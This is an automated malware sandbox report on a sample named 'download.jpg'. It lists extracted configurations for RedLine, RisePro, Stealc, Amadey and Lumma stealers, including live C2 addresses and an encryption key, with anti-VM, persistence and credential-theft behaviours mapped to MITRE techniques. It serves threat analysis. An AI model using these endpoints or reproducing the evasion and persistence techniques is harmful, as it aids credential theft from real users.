amadey | fecbf15e41c3e54ffae04b2a6b39ec748a185f85b8c7a6407a329e6959e9317f

Resubmissions

02-07-2024 16:16

240702-traf6a1blg 4

02-07-2024 16:07

240702-tkq6bsvbqm 10

Analysis

max time kernel
275s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
02-07-2024 16:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

download.jpg
Size

10KB
MD5

521f078abbeb8edbef8a197da243001d
SHA1

4d0b123160c4a9fe95567b78bfad6e1c8040fa5a
SHA256

fecbf15e41c3e54ffae04b2a6b39ec748a185f85b8c7a6407a329e6959e9317f
SHA512

2b063ef18a45187ab4d8c59ca029ce0b1900a5bb3dc25f7d9e982fbe3f0b85b2ae8b05ac1627705eac1ab34e4130c22078d456f8c14d9104ec23b9c8bc820d12
SSDEEP

192:oybUDmI7lgqVr4hhKIhc4DsLY57TSNDs1yZXpO92Bg3mk+hN:7bUDmIJEhtacsuGDayZXk92Bg2kW

Score

10^/10

amadey lumma privateloader redline risepro stealc 4dd39d jony logsdiller cloud (tg: @logsdillabot)discovery evasion execution infostealer loader persistence spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Extracted

Family

risepro

191.101.209.39

77.105.133.27

Extracted

Family

stealc

Botnet

jony

http://85.28.47.4

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.30

Botnet

4dd39d

http://77.91.77.82

Attributes

install_dir
ad40971b6b
install_file
explorti.exe
strings_key
a434973ad22def7137dbb5e059b7081e
url_paths
/Hun4Ko/index.php

rc4.plain

Extracted

Family

lumma

https://stationacutwo.shop/api

https://bouncedgowp.shop/api

https://bannngwko.shop/api

https://bargainnykwo.shop/api

https://affecthorsedpo.shop/api

https://radiationnopp.shop/api

https://answerrsdo.shop/api

https://publicitttyps.shop/api

https://benchillppwo.shop/api

https://reinforcedirectorywd.shop/api

https://potterryisiw.shop/api

https://foodypannyjsud.shop/api

https://contintnetksows.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/6016-851-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5100 created 3408	5100	Spec.pif	54

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	CHC1Ja3N9zVCFx9C8fonBRBA.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	EBGCFBGCBF.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	EGIDBFBFHJ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4368	powershell.exe
3960	powershell.exe
5356	powershell.exe
60	powershell.EXE
3064	powershell.EXE

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CHC1Ja3N9zVCFx9C8fonBRBA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	EBGCFBGCBF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	EBGCFBGCBF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	EGIDBFBFHJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	EGIDBFBFHJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CHC1Ja3N9zVCFx9C8fonBRBA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation	setup.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	CHC1Ja3N9zVCFx9C8fonBRBA.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VitaLink.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VitaLink.url	cmd.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\vitalink.url	taskmgr.exe

Executes dropped EXE 31 IoCs

pid	Process
5184	winrar-x64-701.exe
2824	setup.exe
5444	mtLXB8vLnuL2pf2PMh9t8f_d.exe
216	CHC1Ja3N9zVCFx9C8fonBRBA.exe
5288	VGlFfVqCguuCTXTcD5bE39Y4.exe
5628	Lu14imnD2sxKHhwWy9r1EduD.exe
4236	AqyROM64IPMHFZUpZbqd8xgH.exe
400	5mUTMG7kBiiswxGyspDxDQTV.exe
2980	N5p21fT8ybJlnDuVaCCCazdD.exe
220	EDJoyeu8U6TzpKj3frbTDWze.exe
5632	pfiy2exChn3CqhXvQhVWiOVV.exe
1600	Q4f_SHEDlrPHiA56qKIaPC9v.exe
3176	DIfmdJg10MO9MHmIeAVQyNp0.exe
5824	mtLXB8vLnuL2pf2PMh9t8f_d.tmp
6192	Install.exe
6236	Install.exe
6572	udadvdfreeripper32_64.exe
6660	udadvdfreeripper32_64.exe
6704	Install.exe
6696	Install.exe
6896	VgIvzGc67Nj9MSZyH_qAyqJQ.exe
5100	Spec.pif
6792	EBGCFBGCBF.exe
3424	EGIDBFBFHJ.exe
4772	explorti.exe
4472	eqtpkqwqodik.exe
3944	e5f4ef64a7.exe
6612	KKKEBKJJDG.exe
7056	explorti.exe
2888	Install.exe
212	Install.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine	EBGCFBGCBF.exe
Key opened	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine	EGIDBFBFHJ.exe
Key opened	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine	explorti.exe

Loads dropped DLL 3 IoCs

pid	Process
5824	mtLXB8vLnuL2pf2PMh9t8f_d.tmp
400	5mUTMG7kBiiswxGyspDxDQTV.exe
400	5mUTMG7kBiiswxGyspDxDQTV.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 7 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/216-806-0x0000000000810000-0x000000000119F000-memory.dmp	themida
behavioral1/memory/216-850-0x0000000000810000-0x000000000119F000-memory.dmp	themida
behavioral1/memory/216-849-0x0000000000810000-0x000000000119F000-memory.dmp	themida
behavioral1/memory/216-848-0x0000000000810000-0x000000000119F000-memory.dmp	themida
behavioral1/memory/216-847-0x0000000000810000-0x000000000119F000-memory.dmp	themida
behavioral1/files/0x000700000001acd3-786.dat	themida
behavioral1/memory/216-1771-0x0000000000810000-0x000000000119F000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	CHC1Ja3N9zVCFx9C8fonBRBA.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	CHC1Ja3N9zVCFx9C8fonBRBA.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
27	pastebin.com
51	drive.google.com
285	iplogger.org
31	pastebin.com
210	bitbucket.org
55	drive.google.com
184	bitbucket.org
30	pastebin.com
48	drive.google.com
49	drive.google.com
198	bitbucket.org
284	iplogger.org
32	pastebin.com
50	drive.google.com
188	bitbucket.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
169	api.myip.com
170	api.myip.com
173	ipinfo.io
174	ipinfo.io

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
6728	powercfg.exe
5068	powercfg.exe
1668	powercfg.exe
5080	powercfg.exe
4676	powercfg.exe
2144	powercfg.exe
2736	powercfg.exe
5844	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	setup.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
216	CHC1Ja3N9zVCFx9C8fonBRBA.exe
400	5mUTMG7kBiiswxGyspDxDQTV.exe
400	5mUTMG7kBiiswxGyspDxDQTV.exe
400	5mUTMG7kBiiswxGyspDxDQTV.exe
6792	EBGCFBGCBF.exe
3424	EGIDBFBFHJ.exe
4772	explorti.exe
3944	e5f4ef64a7.exe
7056	explorti.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 5628 set thread context of 6016	5628	Lu14imnD2sxKHhwWy9r1EduD.exe	115
PID 2980 set thread context of 5436	2980	N5p21fT8ybJlnDuVaCCCazdD.exe	120
PID 6896 set thread context of 2296	6896	VgIvzGc67Nj9MSZyH_qAyqJQ.exe	148
PID 4472 set thread context of 6000	4472	eqtpkqwqodik.exe	191
PID 4472 set thread context of 2408	4472	eqtpkqwqodik.exe	196
PID 220 set thread context of 6956	220	EDJoyeu8U6TzpKj3frbTDWze.exe	197
PID 6612 set thread context of 6556	6612	KKKEBKJJDG.exe	201

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorti.job	EBGCFBGCBF.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\Tasks\bmQWCxleEgxbTUrSZz.job	schtasks.exe
File created	C:\Windows\Tasks\bsqNJSiTyoMLfdbIdy.job	schtasks.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4280	sc.exe
7084	sc.exe
6064	sc.exe
6784	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
6548	5628	WerFault.exe
7024	6612	WerFault.exe	199
3700	212	WerFault.exe	219

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5mUTMG7kBiiswxGyspDxDQTV.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5mUTMG7kBiiswxGyspDxDQTV.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4796	timeout.exe
7008	timeout.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
6832	tasklist.exe
5508	tasklist.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Modifies registry class 38 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	firefox.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\dvg9f217archive3.rar:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\winrar-x64-701.exe:Zone.Identifier	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6524	schtasks.exe
6348	schtasks.exe
6136	schtasks.exe
6228	schtasks.exe
6300	schtasks.exe
6252	schtasks.exe
2540	schtasks.exe
3796	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2824	setup.exe
2824	setup.exe
216	CHC1Ja3N9zVCFx9C8fonBRBA.exe
216	CHC1Ja3N9zVCFx9C8fonBRBA.exe
2980	N5p21fT8ybJlnDuVaCCCazdD.exe
2980	N5p21fT8ybJlnDuVaCCCazdD.exe
3176	DIfmdJg10MO9MHmIeAVQyNp0.exe
3176	DIfmdJg10MO9MHmIeAVQyNp0.exe
400	5mUTMG7kBiiswxGyspDxDQTV.exe
400	5mUTMG7kBiiswxGyspDxDQTV.exe
3960	powershell.exe
3960	powershell.exe
5356	powershell.exe
5356	powershell.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
3960	powershell.exe
5960	7zFM.exe
5960	7zFM.exe
5356	powershell.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
3960	powershell.exe
5356	powershell.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
